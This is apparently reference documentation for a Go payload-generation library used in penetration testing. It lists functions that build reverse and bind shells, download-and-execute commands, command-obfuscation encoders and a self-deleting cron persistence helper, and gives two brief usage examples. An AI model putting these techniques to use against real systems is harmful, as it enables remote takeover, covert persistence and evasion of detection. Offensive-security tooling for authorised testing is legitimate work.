Documentation
Index
- func BindShellMkfifoNetcat(bport int) string
- func BindShellMknodNetcat(bport int) string
- func BindShellNetcatGaping(bport int) string
- func BindShellTelnetdLogin(bport int) string
- func EncodeCommandBrace(cmd string) string
- func EncodeCommandIFS(cmd string) string
- func EncodeEchoBase64ToBash(cmd string) string
- func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
- func LinuxEitherHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
- func ReverseShellBash(lhost string, lport int) string
- func ReverseShellGJSScript(lhost string, lport int) string
- func ReverseShellJJSScript(lhost string, lport int, ssl bool) string
- func ReverseShellMkfifoOpenSSL(lhost string, lport int) string
- func ReverseShellMkfifoTelnet(lhost string, lport int, colon bool) string
- func ReverseShellMknodNetcat(lhost string, lport int) string
- func ReverseShellMknodOpenSSL(lhost string, lport int) string
- func ReverseShellMknodTelnet(lhost string, lport int, colon bool) string
- func ReverseShellNetcatGaping(lhost string, lport int) string
- func SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string)
- func ShortPHPLinuxInteractive(lhost string, lport int) string
- func UnflattenedClassicJava(lhost string, lport int) string
- func UnflattenedPHP(lhost string, lport int, shell string, encrypted bool) string
- func UnflattenedReversePython27(lhost string, lport int) string
- func UnflattenedSecureReversePython27(lhost string, lport int) string
- func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
Constants
This section is empty.
Variables
This section is empty.
Functions
func BindShellMkfifoNetcat
func BindShellMknodNetcat
func BindShellNetcatGaping
func BindShellTelnetdLogin
func EncodeCommandBrace
func EncodeCommandIFS
func EncodeEchoBase64ToBash (added in v1.0.2)
Base64 encodes the command. Wraps it in logic to base64 decode and pipe to bash.
func LinuxCurlHTTPDownloadAndExecute (added in v1.0.8)
Download a remote file with curl, execute it, and delete it.
func LinuxEitherHTTPDownloadAndExecute (added in v1.4.0)
func LinuxEitherHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string
Download a remote file with curl or wget, execute it, and delete it.
func ReverseShellBash
func ReverseShellGJSScript (added in v1.0.12)
Generates a script that can be used to create a reverse shell via gjs (GNOME JS, present by default on Ubuntu and Debian).
func ReverseShellJJSScript (added in v1.0.13)
Generates a script that can be used to create a reverse shell via jjs (Java JavaScript). This is an adapted version of Frohoff's OG gist. Additionally, the logic for disabling TLS validation was adapted from a blog post written by Callan Howell-Pavia.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
https://gist.github.com/frohoff/8e7c2bf3737032a25051
func ReverseShellMkfifoOpenSSL (added in v1.0.14)
func ReverseShellMknodNetcat (added in v1.8.0)
Reverse shell using nc when -e isn't an option.
func ReverseShellMknodTelnet
func SelfRemovingCron (added in v1.6.0)
func SelfRemovingCron(user string, cronPath string, xploitPath string, payload string) (string, string)
Creates two strings that can be used for gaining execution via "/etc/cron.d". The first return ("cron") should be uploaded to "cronPath" (presumably /etc/cron.d but I don't know your life), and the second return should be uploaded to "xploitPath" (e.g. /tmp/helloworld). The cron file will trigger execution of the bash script which will delete both the cron and itself.
Example usage:
	cronPath := fmt.Sprintf("/etc/cron.d/%s", random.RandLetters(8))
	xploitPath := fmt.Sprintf("/tmp/%s", random.RandLetters(8))
	xploit, ok := generatePayload(conf)
	if !ok {
		return false
	}
	cron, xploit := payload.SelfRemovingCron("root", cronPath, xploitPath, xploit)
func ShortPHPLinuxInteractive (added in v1.11.0)
A short payload that creates a reverse shell using /bin/sh -i.
func UnflattenedClassicJava (added in v1.9.5)
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
func UnflattenedPHP (added in v1.11.0)
Creates a reverse shell using PHP. The user can specify the shell used, for example cmd.exe, /bin/sh, etc. The user also specifies whether the reverse shell should be encrypted.
Example usage:
	payload.UnflattenedPHP("10.9.49.80", 1270, "/bin/sh", true)
func UnflattenedReversePython27 (added in v1.1.0)
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func UnflattenedSecureReversePython27 (added in v1.1.0)
An unflattened reverse shell that uses an SSL socket and works on Python 2.7, 3+, Windows and Linux.
Types
This section is empty.